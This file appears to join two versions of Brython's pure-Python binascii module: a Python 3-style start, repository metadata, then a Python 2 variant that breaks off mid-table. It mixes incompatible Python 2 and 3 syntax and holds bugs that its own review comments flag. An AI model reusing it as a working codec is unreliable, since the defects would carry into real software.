    0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
    0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
    0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
    0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
    0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
    0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
    0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
    0x2d02ef8d
]
def crc32(s, crc=0):
    """Compute the CRC-32 checksum of string s, starting from crc.

    Returns a *signed* 32-bit value (CPython 2 semantics).
    NOTE(review): Python 3's binascii.crc32 returns an unsigned value;
    callers expecting py3 semantics should mask with & 0xffffffff.
    """
    crc = ~int(crc) & 0xffffffff
    #crc = ~long(crc) & 0xffffffffL
    for c in s:
        crc = crc_32_tab[(crc ^ int(ord(c))) & 0xff] ^ (crc >> 8)
        #crc = crc_32_tab[(crc ^ long(ord(c))) & 0xffL] ^ (crc >> 8)
        #/* Note: (crc >> 8) MUST zero fill on left
    result = crc ^ 0xffffffff
    # fold into the signed 32-bit range; bug fix: '>=' so that exactly
    # 2**31 maps to -2**31 instead of leaking through unchanged
    if result >= 2**31:
        result = ((result + 2**31) % 2**32) - 2**31
    return result
def b2a_hex(s):
    """Return the hexadecimal representation of s (two lower-case digits
    per input byte).

    str input yields str; bytes yields bytes; bytearray yields bytearray.
    """
    if isinstance(s, bytes) or isinstance(s, bytearray):
        # iterating bytes/bytearray already yields ints; keep the digit
        # codes as ints so they can feed bytes()/bytearray() directly
        conv = lambda x:x
        unconv = lambda x:x
    else:
        conv = lambda x:ord(x)
        unconv = lambda x:chr(x)
    result = []
    for char in s:
        # high nibble
        c = (conv(char) >> 4) & 0xf
        if c > 9:
            c = c + ord('a') - 10
        else:
            c = c + ord('0')
        result.append(unconv(c))
        # low nibble
        c = conv(char) & 0xf
        if c > 9:
            c = c + ord('a') - 10
        else:
            c = c + ord('0')
        result.append(unconv(c))
    if isinstance(s, bytes):
        # bug fix: bytes(list, encoding=...) raises TypeError -- a list of
        # ints converts directly
        return bytes(result)
    if isinstance(s, bytearray):
        return bytearray(result)
    return ''.join(result)
hexlify = b2a_hex  # CPython-compatible alias
# Maps ASCII codes (0-127) of hex digits, both cases, to their values;
# -1 marks an invalid digit.  Used by a2b_hex().
table_hex = [
  -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
  -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
  -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
   0, 1, 2, 3,  4, 5, 6, 7,  8, 9,-1,-1, -1,-1,-1,-1,
  -1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
  -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
  -1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
  -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
]
def a2b_hex(t):
    """Decode a hexadecimal string (or bytes/bytearray) to bytes.

    Raises TypeError on odd-length input or non-hex digits.
    NOTE(review): CPython raises binascii.Error in these cases, and a
    character above '\\x7f' indexes past table_hex, so its IndexError is
    misreported as 'Odd-length string' -- confirm before relying on the
    error type.
    """
    result = []
    def pairs_gen(s):
        # yield (high, low) digit values two characters at a time
        if isinstance(s, bytes) or isinstance(s, bytearray):
            conv = lambda x:x
        else:
            conv = lambda x:ord(x)
        while s:
            try:
                yield table_hex[conv(s[0])], table_hex[conv(s[1])]
            except IndexError:
                if len(s):
                    raise TypeError('Odd-length string')
                return
            s = s[2:]
    for a, b in pairs_gen(t):
        if a < 0 or b < 0:
            raise TypeError('Non-hexadecimal digit found')
        result.append(chr((a << 4) + b))
    # __BRYTHON__.charset is a Brython runtime global; not defined here
    return bytes(''.join(result), __BRYTHON__.charset)
unhexlify = a2b_hex  # CPython-compatible alias
| {
"repo_name": "jonathanverner/brython",
"path": "www/src/Lib/binascii.py",
"copies": "2",
"size": "25218",
"license": "bsd-3-clause",
"hash": 2601331929557310500,
"line_mean": 32.8042895442,
"line_max": 85,
"alpha_frac": 0.4936553256,
"autogenerated": false,
"ratio": 2.5976514215080346,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40913067471080344,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of binascii.
Rather slow and buggy in corner cases.
PyPy provides an RPython version too.
"""
class Error(Exception):
    # Base exception for malformed input (mirrors CPython's binascii.Error).
    pass
class Done(Exception):
    # Internal control flow: signals the ':' terminator in hqx input.
    pass
class Incomplete(Exception):
    # Kept for API compatibility; not raised in the visible code.
    pass
def a2b_uu(s):
    """Decode one line of uuencoded data (Python 2 variant: returns str).

    The first character encodes the payload length; the remainder decodes
    in groups of four characters to three bytes.
    """
    if not s:
        return ''
    # the leading character carries the decoded byte count (mod 64)
    length = (ord(s[0]) - 0x20) % 64
    def quadruplets_gen(s):
        # yield the input four characters at a time, space-padding a short
        # final group
        while s:
            try:
                yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
            except IndexError:
                s += '   '
                yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
                return
            s = s[4:]
    try:
        # each character contributes 6 bits; recombine into 3 bytes
        result = [''.join(
                    [chr((A - 0x20) << 2 | (((B - 0x20) >> 4) & 0x3)),
                     chr(((B - 0x20) & 0xf) << 4 | (((C - 0x20) >> 2) & 0xf)),
                     chr(((C - 0x20) & 0x3) << 6 | ((D - 0x20) & 0x3f))
                    ]) for A, B, C, D in quadruplets_gen(s[1:].rstrip())]
    except ValueError:
        raise Error('Illegal char')
    result = ''.join(result)
    trailingdata = result[length:]
    # trailing-garbage check disabled in this variant (cf. the Python 3
    # copy earlier in this file, which raises Error here)
    # if trailingdata.strip('\x00'):
    #     raise Error('Trailing garbage')
    result = result[:length]
    if len(result) < length:
        result += ((length - len(result)) * '\x00')
    return result
def b2a_uu(s):
    """Uuencode a single line of at most 45 bytes (Python 2 variant --
    note the 077 octal literal below, which is a syntax error on
    Python 3)."""
    length = len(s)
    if length > 45:
        raise Error('At most 45 bytes at once')
    def triples_gen(s):
        # yield character ordinals three at a time, NUL-padding the tail
        while s:
            try:
                yield ord(s[0]), ord(s[1]), ord(s[2])
            except IndexError:
                s += '\0\0'
                yield ord(s[0]), ord(s[1]), ord(s[2])
                return
            s = s[3:]
    # split 3 bytes into four 6-bit groups biased into the printable range
    result = [''.join(
                [chr(0x20 + (( A >> 2 ) & 0x3F)),
                 chr(0x20 + (((A << 4) | ((B >> 4) & 0xF)) & 0x3F)),
                 chr(0x20 + (((B << 2) | ((C >> 6) & 0x3)) & 0x3F)),
                 chr(0x20 + (( C ) & 0x3F))])
              for A, B, C in triples_gen(s)]
    return chr(ord(' ') + (length & 077)) + ''.join(result) + '\n'
# Base64 decoding table: maps each alphabet character to its 6-bit value;
# '=' maps to 0 so padding folds harmlessly into the bit accumulator.
table_a2b_base64 = {
    'A': 0,
    'B': 1,
    'C': 2,
    'D': 3,
    'E': 4,
    'F': 5,
    'G': 6,
    'H': 7,
    'I': 8,
    'J': 9,
    'K': 10,
    'L': 11,
    'M': 12,
    'N': 13,
    'O': 14,
    'P': 15,
    'Q': 16,
    'R': 17,
    'S': 18,
    'T': 19,
    'U': 20,
    'V': 21,
    'W': 22,
    'X': 23,
    'Y': 24,
    'Z': 25,
    'a': 26,
    'b': 27,
    'c': 28,
    'd': 29,
    'e': 30,
    'f': 31,
    'g': 32,
    'h': 33,
    'i': 34,
    'j': 35,
    'k': 36,
    'l': 37,
    'm': 38,
    'n': 39,
    'o': 40,
    'p': 41,
    'q': 42,
    'r': 43,
    's': 44,
    't': 45,
    'u': 46,
    'v': 47,
    'w': 48,
    'x': 49,
    'y': 50,
    'z': 51,
    '0': 52,
    '1': 53,
    '2': 54,
    '3': 55,
    '4': 56,
    '5': 57,
    '6': 58,
    '7': 59,
    '8': 60,
    '9': 61,
    '+': 62,
    '/': 63,
    '=': 0,
}
def a2b_base64(s):
    """Decode base64 data to a str (Python 2 variant -- note the use of
    the py2-only name 'unicode' below)."""
    if not isinstance(s, (str, unicode)):
        raise TypeError("expected string or unicode, got %r" % (s,))
    s = s.rstrip()
    # clean out all invalid characters, this also strips the final '=' padding
    # check for correct padding
    def next_valid_char(s, pos):
        # return the next alphabet character after pos, or None; used to
        # validate the position of '=' padding
        for i in range(pos + 1, len(s)):
            c = s[i]
            if c < '\x7f':
                try:
                    table_a2b_base64[c]
                    return c
                except KeyError:
                    pass
        return None
    quad_pos = 0
    leftbits = 0
    leftchar = 0
    res = []
    for i, c in enumerate(s):
        if c > '\x7f' or c == '\n' or c == '\r' or c == ' ':
            continue
        if c == '=':
            # '=' only counts as padding after at least two data characters
            # of the current quad
            if quad_pos < 2 or (quad_pos == 2 and next_valid_char(s, i) != '='):
                continue
            else:
                leftbits = 0
                break
        try:
            next_c = table_a2b_base64[c]
        except KeyError:
            continue
        # accumulate 6 bits per character, emitting whole bytes
        quad_pos = (quad_pos + 1) & 0x03
        leftchar = (leftchar << 6) | next_c
        leftbits += 6
        if leftbits >= 8:
            leftbits -= 8
            res.append((leftchar >> leftbits & 0xff))
            leftchar &= ((1 << leftbits) - 1)
    if leftbits != 0:
        raise Error('Incorrect padding')
    return ''.join([chr(i) for i in res])
# Base64 encoding table: the 64-character alphabet, indexed by 6-bit value.
table_b2a_base64 = \
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b2a_base64(s):
    """Encode a str to base64, ending with a newline (Python 2 variant)."""
    length = len(s)
    # number of bytes in the final, partial group (0, 1 or 2)
    final_length = length % 3
    def triples_gen(s):
        # yield character ordinals three at a time, NUL-padding the tail
        while s:
            try:
                yield ord(s[0]), ord(s[1]), ord(s[2])
            except IndexError:
                s += '\0\0'
                yield ord(s[0]), ord(s[1]), ord(s[2])
                return
            s = s[3:]
    # encode only whole 3-byte groups here; the tail is handled below with
    # explicit '=' padding
    a = triples_gen(s[ :length - final_length])
    result = [''.join(
                [table_b2a_base64[( A >> 2 ) & 0x3F],
                 table_b2a_base64[((A << 4) | ((B >> 4) & 0xF)) & 0x3F],
                 table_b2a_base64[((B << 2) | ((C >> 6) & 0x3)) & 0x3F],
                 table_b2a_base64[( C ) & 0x3F]])
              for A, B, C in a]
    final = s[length - final_length:]
    if final_length == 0:
        snippet = ''
    elif final_length == 1:
        # one leftover byte -> two characters + '=='
        a = ord(final[0])
        snippet = table_b2a_base64[(a >> 2 ) & 0x3F] + \
                  table_b2a_base64[(a << 4 ) & 0x3F] + '=='
    else:
        # two leftover bytes -> three characters + '='
        a = ord(final[0])
        b = ord(final[1])
        snippet = table_b2a_base64[(a >> 2) & 0x3F] + \
                  table_b2a_base64[((a << 4) | (b >> 4) & 0xF) & 0x3F] + \
                  table_b2a_base64[(b << 2) & 0x3F] + '='
    return ''.join(result) + snippet + '\n'
def a2b_qp(s, header=False):
    """Decode a quoted-printable string to a str (Python 2 variant).

    header=True additionally maps '_' to a space.
    """
    inp = 0
    odata = []
    while inp < len(s):
        if s[inp] == '=':
            inp += 1
            if inp >= len(s):
                # trailing lone '=' is dropped
                break
            # Soft line breaks
            if (s[inp] == '\n') or (s[inp] == '\r'):
                if s[inp] != '\n':
                    while inp < len(s) and s[inp] != '\n':
                        inp += 1
                if inp < len(s):
                    inp += 1
            elif s[inp] == '=':
                # broken case from broken python qp
                odata.append('=')
                inp += 1
            # NOTE(review): s[inp + 1] raises IndexError when the input
            # ends with '=' plus a single hex digit -- missing bounds check
            elif s[inp] in hex_numbers and s[inp + 1] in hex_numbers:
                ch = chr(int(s[inp:inp+2], 16))
                inp += 2
                odata.append(ch)
            else:
                # not a valid escape: emit the '=' literally
                odata.append('=')
        elif header and s[inp] == '_':
            odata.append(' ')
            inp += 1
        else:
            odata.append(s[inp])
            inp += 1
    return ''.join(odata)
def b2a_qp(data, quotetabs=False, istext=True, header=False):
    """quotetabs=True means that tab and space characters are always
    quoted.
    istext=False means that \r and \n are treated as regular characters
    header=True encodes space characters with '_' and requires
    real '_' characters to be quoted.
    """
    MAXLINESIZE = 76
    # See if this string is using CRLF line ends
    lf = data.find('\n')
    crlf = lf > 0 and data[lf-1] == '\r'
    inp = 0
    linelen = 0
    odata = []
    while inp < len(data):
        c = data[inp]
        # characters that must be hex-escaped: non-printables, '=', '_' in
        # header mode, a lone '.' at line start, bare CR/LF in binary mode,
        # and trailing/forced-quoted whitespace
        if (c > '~' or
            c == '=' or
            (header and c == '_') or
            (c == '.' and linelen == 0 and (inp+1 == len(data) or
                                            data[inp+1] == '\n' or
                                            data[inp+1] == '\r')) or
            (not istext and (c == '\r' or c == '\n')) or
            ((c == '\t' or c == ' ') and (inp + 1 == len(data))) or
            (c <= ' ' and c != '\r' and c != '\n' and
             (quotetabs or (not quotetabs and (c != '\t' and c != ' '))))):
            linelen += 3
            if linelen >= MAXLINESIZE:
                # emit a soft line break before overflowing the line limit
                odata.append('=')
                if crlf: odata.append('\r')
                odata.append('\n')
                linelen = 3
            odata.append('=' + two_hex_digits(ord(c)))
            inp += 1
        else:
            if (istext and
                (c == '\n' or (inp+1 < len(data) and c == '\r' and
                               data[inp+1] == '\n'))):
                linelen = 0
                # Protect against whitespace on end of line
                if (len(odata) > 0 and
                    (odata[-1] == ' ' or odata[-1] == '\t')):
                    # retroactively hex-escape the trailing blank
                    ch = ord(odata[-1])
                    odata[-1] = '='
                    odata.append(two_hex_digits(ch))
                if crlf: odata.append('\r')
                odata.append('\n')
                if c == '\r':
                    inp += 2
                else:
                    inp += 1
            else:
                if (inp + 1 < len(data) and
                    data[inp+1] != '\n' and
                    (linelen + 1) >= MAXLINESIZE):
                    # soft line break before a literal character would
                    # overflow the line
                    odata.append('=')
                    if crlf: odata.append('\r')
                    odata.append('\n')
                    linelen = 0
                linelen += 1
                if header and c == ' ':
                    c = '_'
                odata.append(c)
                inp += 1
    return ''.join(odata)
# Upper-case hexadecimal digits, indexed by nibble value.
hex_numbers = '0123456789ABCDEF'
def hex(n):
    """Return the hexadecimal representation of integer n (upper-case,
    no '0x' prefix, leading '-' for negatives).  Shadows the builtin.

    Python 2 variant: relies on '/' being integer division below.
    """
    if n == 0:
        return '0'
    if n < 0:
        n = -n
        sign = '-'
    else:
        sign = ''
    arr = []
    def hex_gen(n):
        """ Yield a nibble at a time. """
        while n:
            yield n % 0x10
            # Python 2 integer division; would loop forever under Python 3
            n = n / 0x10
    for nibble in hex_gen(n):
        arr = [hex_numbers[nibble]] + arr
    return sign + ''.join(arr)
def two_hex_digits(n):
    """Return the two-digit upper-case hex representation of 0 <= n < 256."""
    # Python 2 integer division; invalid str index under Python 3
    return hex_numbers[n / 0x10] + hex_numbers[n % 0x10]
def strhex_to_int(s):
    """Parse an upper-case hexadecimal string into an integer."""
    i = 0
    for c in s:
        i = i * 0x10 + hex_numbers.index(c)
    return i
# The 64-character binhex4 alphabet, indexed by 6-bit value.
hqx_encoding = '!"#$%&\'()*+,-012345689@ABCDEFGHIJKLMNPQRSTUVXYZ[`abcdefhijklmpqr'
# Sentinel codes used by table_a2b_hqx below:
DONE = 0x7f   # the ':' terminator
SKIP = 0x7e   # whitespace (\n, \r) to ignore
FAIL = 0x7d   # any character outside the alphabet
# binhex4 decoding table, indexed by character ordinal (0-255): 6-bit value
# for alphabet characters, or one of the DONE/SKIP/FAIL sentinels.
table_a2b_hqx = [
    #^@ ^A ^B ^C ^D ^E ^F ^G
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    #\b \t \n ^K ^L \r ^N ^O
    FAIL, FAIL, SKIP, FAIL, FAIL, SKIP, FAIL, FAIL,
    #^P ^Q ^R ^S ^T ^U ^V ^W
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    #^X ^Y ^Z ^[ ^\ ^] ^^ ^_
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    # ! " # $ % & '
    FAIL, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
    #( ) * + , - . /
    0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, FAIL, FAIL,
    #0 1 2 3 4 5 6 7
    0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, FAIL,
    #8 9 : ; < = > ?
    0x14, 0x15, DONE, FAIL, FAIL, FAIL, FAIL, FAIL,
    #@ A B C D E F G
    0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D,
    #H I J K L M N O
    0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, FAIL,
    #P Q R S T U V W
    0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, FAIL,
    #X Y Z [ \ ] ^ _
    0x2C, 0x2D, 0x2E, 0x2F, FAIL, FAIL, FAIL, FAIL,
    #` a b c d e f g
    0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, FAIL,
    #h i j k l m n o
    0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, FAIL, FAIL,
    #p q r s t u v w
    0x3D, 0x3E, 0x3F, FAIL, FAIL, FAIL, FAIL, FAIL,
    #x y z { | } ~ ^?
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    ]
def a2b_hqx(s):
    """Decode binhex4-armored text *s*.

    Returns a tuple ``(data, done)`` where ``done`` is 1 if the stream
    terminator character (':') was seen, and 0 otherwise.
    """
    result = []
    def quadruples_gen(s):
        # Translate each character to its 6-bit value via table_a2b_hqx and
        # yield the values in groups of four; the trailing (possibly short)
        # group is yielded last.
        t = []
        for c in s:
            res = table_a2b_hqx[ord(c)]
            if res == SKIP:
                # Whitespace (\n, \r) is silently ignored.
                continue
            elif res == FAIL:
                # Error is this module's exception class (defined earlier).
                raise Error('Illegal character')
            elif res == DONE:
                # ':' terminator: flush the pending group, then signal the
                # caller via the Done exception (defined earlier in module).
                yield t
                raise Done
            else:
                t.append(res)
            if len(t) == 4:
                yield t
                t = []
        yield t
    done = 0
    try:
        # Each full group of four 6-bit values packs into three bytes;
        # shorter trailing groups contribute proportionally fewer bytes.
        for snippet in quadruples_gen(s):
            length = len(snippet)
            if length == 4:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
                result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
                result.append(chr(((snippet[2] & 0x03) << 6) | (snippet[3])))
            elif length == 3:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
                result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
            elif length == 2:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
    except Done:
        # Terminator reached; report it through the second tuple element.
        done = 1
    except Error:
        raise
    return (''.join(result), done)
def b2a_hqx(s):
    """Encode string *s* using binhex4's 6-bits-per-character armoring.

    Every group of three input bytes becomes four output characters from
    hqx_encoding; a trailing group of one or two bytes becomes two or
    three characters respectively.
    """
    out = []
    for start in range(0, len(s), 3):
        chunk = [ord(ch) for ch in s[start:start + 3]]
        n = len(chunk)
        # First output char always exists: top 6 bits of byte 0.
        out.append(hqx_encoding[(chunk[0] & 0xfc) >> 2])
        if n == 1:
            # Only byte 0: its low 2 bits, left-justified.
            out.append(hqx_encoding[(chunk[0] & 0x03) << 4])
        else:
            out.append(hqx_encoding[((chunk[0] & 0x03) << 4) |
                                    ((chunk[1] & 0xf0) >> 4)])
            if n == 2:
                out.append(hqx_encoding[(chunk[1] & 0x0f) << 2])
            else:
                out.append(hqx_encoding[((chunk[1] & 0x0f) << 2) |
                                        ((chunk[2] & 0xc0) >> 6)])
                out.append(hqx_encoding[chunk[2] & 0x3f])
    return ''.join(out)
# CRC-CCITT (polynomial 0x1021) lookup table, one 16-bit entry per byte value.
crctab_hqx = [
    0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
    0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
    0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
    0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
    0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
    0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
    0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
    0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
    0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
    0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
    0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
    0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
    0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
    0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
    0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
    0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
    0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
    0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
    0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
    0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
    0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
    0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
    0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
    0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
    0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
    0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
    0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
    0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
    0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
    0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
    0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
    0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
]
def crc_hqx(s, crc):
    """Accumulate the binhex4 (CRC-CCITT) checksum of string *s* into *crc*
    and return the updated 16-bit value."""
    for byte in map(ord, s):
        # Shift one byte in and fold through the table; the mask keeps the
        # running value inside 16 bits.
        crc = ((crc << 8) & 0xff00) ^ crctab_hqx[((crc >> 8) & 0xff) ^ byte]
    return crc
def rlecode_hqx(s):
    """Run length encoding for binhex4.

    A run of n (4 <= n <= 255) copies of c is emitted as c + '\\x90' +
    chr(n); a literal '\\x90' is escaped as '\\x90' + '\\x00'.  Unlike the
    CPython implementation, runs of '\\x90' are run-length encoded too.
    """
    if not s:
        return ''
    out = []

    def emit(ch, run):
        # Append the encoding of one run of `run` copies of `ch`.
        literal = ['\x90', '\x00'] if ch == '\x90' else [ch]
        if run == 1:
            out.extend(literal)
        elif run < 4:
            # Short runs are cheaper spelled out literally.
            out.extend(literal * run)
        elif ch == '\x90':
            out.extend(['\x90', '\x00', '\x90', chr(run)])
        else:
            out.extend([ch, '\x90', chr(run)])

    prev = s[0]
    run = 1
    # Iterate over everything after s[0] (already held in `prev`) plus a
    # sentinel that differs from the last character, which forces the final
    # run to be flushed without being emitted itself.
    sentinel = '?' if s[-1] == '!' else '!'
    for ch in s[1:] + sentinel:
        if ch == prev and run < 255:
            run += 1
        else:
            emit(prev, run)
            run = 1
            prev = ch
    return ''.join(out)
def rledecode_hqx(s):
    """Expand binhex4 run-length encoding.

    '\\x90' is the escape byte: '\\x90' + chr(n) (n > 0) repeats the
    previous character so it appears n times in total, while
    '\\x90' + '\\x00' is a literal '\\x90'.
    """
    pieces = s.split('\x90')
    out = [pieces[0]]
    prev = pieces[0]
    for piece in pieces[1:]:
        # The first character of each piece is the byte that followed the
        # escape; it selects repeat-count vs. literal-\x90 semantics.
        count = ord(piece[0])
        if count:
            out.append(prev[-1] * (count - 1))
            prev = piece
        else:
            out.append('\x90')
            prev = '\x90'
        out.append(piece[1:])
    return ''.join(out)
# CRC-32 (polynomial 0xEDB88320, as used by zlib/zip) lookup table, one
# 32-bit entry per byte value.
# NOTE: the trailing 'L' long-integer suffix makes this Python-2-only syntax.
crc_32_tab = [
    0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L,
    0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L,
    0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L,
    0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL,
    0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L,
    0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L,
    0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L,
    0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL,
    0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L,
    0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL,
    0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L,
    0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L,
    0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L,
    0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL,
    0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL,
    0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L,
    0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL,
    0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L,
    0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L,
    0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L,
    0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL,
